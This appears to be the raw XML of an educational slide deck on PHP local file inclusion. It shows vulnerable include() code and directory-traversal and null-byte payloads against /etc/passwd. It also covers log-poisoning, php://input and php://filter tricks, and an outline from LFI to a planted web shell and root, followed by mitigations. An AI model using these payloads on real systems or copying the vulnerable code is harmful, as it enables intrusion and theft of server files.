          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LFI exploitation is typically due to poor user input sanitization.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Just listen to Agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mulder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and Trust NO ONE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the subject of User Input…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50178" name="Picture 2" descr="http://menzies.us/img/trust-no-one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18457" b="18457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Poorly designed LFI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1: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>php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include($_REQUEST[“file”]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>?&gt;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 smtClean="0"/>
              <a:t>2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>php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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>($_REQUEST[“file”]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> $file = $_REQUEST[“file”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> include(“$file.php”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Better LFI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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>php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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>($_GET[“file”]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  //remove any attempts at directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  $file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(‘../’, ‘’, $_GET[‘file’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  include(“$file.php”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>}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?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone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LFI detection bypasses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Even our “Better” design has flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Bypassed by encoding characters into hexadecimal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://example.com/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” can be stripped off the request via Poison null byte %00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://example.com/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00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Allow user input, but only from select choices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect your code!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Most secure LFI - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63490" name="Picture 2" descr="https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcThXnPLTBuRIPldeZpABRrewyQuRyYjIx4sq8VBv8dKndzpgs1ZB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 cstate="print"/>
          <a:srcRect l="3317" r="3317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So, we can execute local files as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code, what can this get us?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If we can get files uploaded to the server, even in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, we can include them as executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can you think of typical ways to get files on a system?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Green = source IP address   Yellow = Requested URL and GET Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pink = HTTP Server return code    Blue = User agent of browser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Apache Log file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91139" name="Picture 3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9835" b="9835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LFI Exploit- Access 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Include apache Access Log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Via telnet HTTP request </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Via curl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using a regular browser will likely not work as the browser makes automatic substitutions before actually making the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Via modifying User agent to contain PHP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We do not condone the use of the contents of this talk for nefarious or illegal purposes.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following presentation is for Educational Purposes Only</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89092" name="Picture 4" descr="http://bulk.destructoid.com/ul/104600-how-mega-man-ii-defined-its-series/disclaimer-468x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347" r="347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 Injection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3 stage attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Seed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with appropriate PHP code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to execute PHP code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4343400"/>
            <a:ext cx="52959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LFI Exploit – PHP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Execute PHP code using the php://input file and posting PHP code/commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hackbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Firefox extension makes this very easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>https://addons.mozilla.org/en-us/firefox/addon/hackbar/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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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easy we almost didn’t need a talk…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82946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9768" b="9768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LFI Exploit - /proc/self/environ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Include /proc/self/environ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If apache has rights to view, including will list current processes, including things like the HTTP_USER_AGENT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you have previously modified your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>useragent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code  (say “&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>();?&gt;” instead of “Mozilla/5.0”) it will execute as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code when environ is executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t run into this one very often, most systems do not allow apache to have read permissions to environ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LFI Exploit – PHP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Include your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> session file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Determine your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from browser cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The trick to this one is identifying where your session file is stored and if the admin has configured unique settings may prove difficult.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try to include in the normal session storage locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/sess_mysessionid%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/lib/php5/sess_mysessionid%00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LFI Exploit – Allowed Uploads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Some websites allow users to upload files as part of the use of the app. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically an avatar or picture upload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dit an image file, and place plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code somewhere in the middle of the image file.  The image should still pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> validation due to the appropriate header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Include the picture using the LFI and voila.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Demo time…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hack the planet!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Gibson Powering Up…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77832" name="Picture 8" descr="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcSzj_SvwhzynJClH-7eO2XhjgY6Cd7fwznrnL6S0wa5zSZ7oXZ7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 cstate="print"/>
          <a:srcRect t="4153" b="4153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LFI Exploit – Read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Read any file on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Since all included files that contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are executed upon include we can never read any of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files, they instead execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP Filters will bypass this.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Filters LFI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sz="2600" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>=php://filter/read=convert.base64-encode/resource=config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>This code will base64 the resource “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>” (like if it was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, but with base64′d) with that, your code won’t be executed, and you’ll can base64_decode() it after to take the original config.php file. This method won’t need magic quotes but you’ll need to have a PHP Version higher or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>equal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>to PHP5.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LFI Reconnaissance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Does a folder exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simply attempt to directory traverse in and out of the directory.  If it exists the include will work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>=../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>doiexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>/../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>etc/passwd%00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is PHP?    Hypertext Preprocessor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What does that really mean?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code is executed server side at runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML is the output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be configured without the use of .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>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LFI -&gt; Root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Recon the application / locate LFI injection point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use LFI to gather as much data about the system as you can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drop file upload script into /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use file upload script to add additional files to system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use shell to LPE to root, copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shell into suitable web directory to use for further exploitation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Now it’s time for LPE!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So, we have many ways to get PHP level access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83970" name="Picture 2" descr="http://blog.hot-root.com/wp-content/uploads/2012/05/tux_wearing_shirt_hg_clr-300x300.gif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 cstate="print"/>
          <a:srcRect t="19876" b="19876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Privilege Escalation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Now that we have valid PHP / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> access on the box can we get root?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local privilege escalations are vulnerabilities that allow a non-privileged user to become root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use user level access to determine system information, version, packages, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Head to exploit-db.com (or elsewhere)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  Nothing quite like the feel of a freshly popped box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Root.  It does a body good.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79877" name="Picture 5" descr="http://www.social-engineer.org/wp-content/uploads/2011/06/success_baby1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4415" b="4415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LFI Protections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Activate magic quotes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>open_basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to only read into the web folder and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitize User input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>by parsing out ‘/’, ‘.’, and ‘%00’ for starters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Remove apache read permissions on access.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Monitor /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> for file additions (/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> is read/write to everyone)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use static includes instead of dynamic ones if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>If ($_GET[‘file’] == ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>mypage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>’){include(‘mypage.php’);};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Q&amp;A Time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1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capture the flag, polish your skills, stay up all night!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#exploit206 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>internot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> CTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>writeup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> http://dl.dropbox.com/u/18949146/Exploit206_HaxMe05_WriteUp_2.pdf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 us in #exploit206 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>freenode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
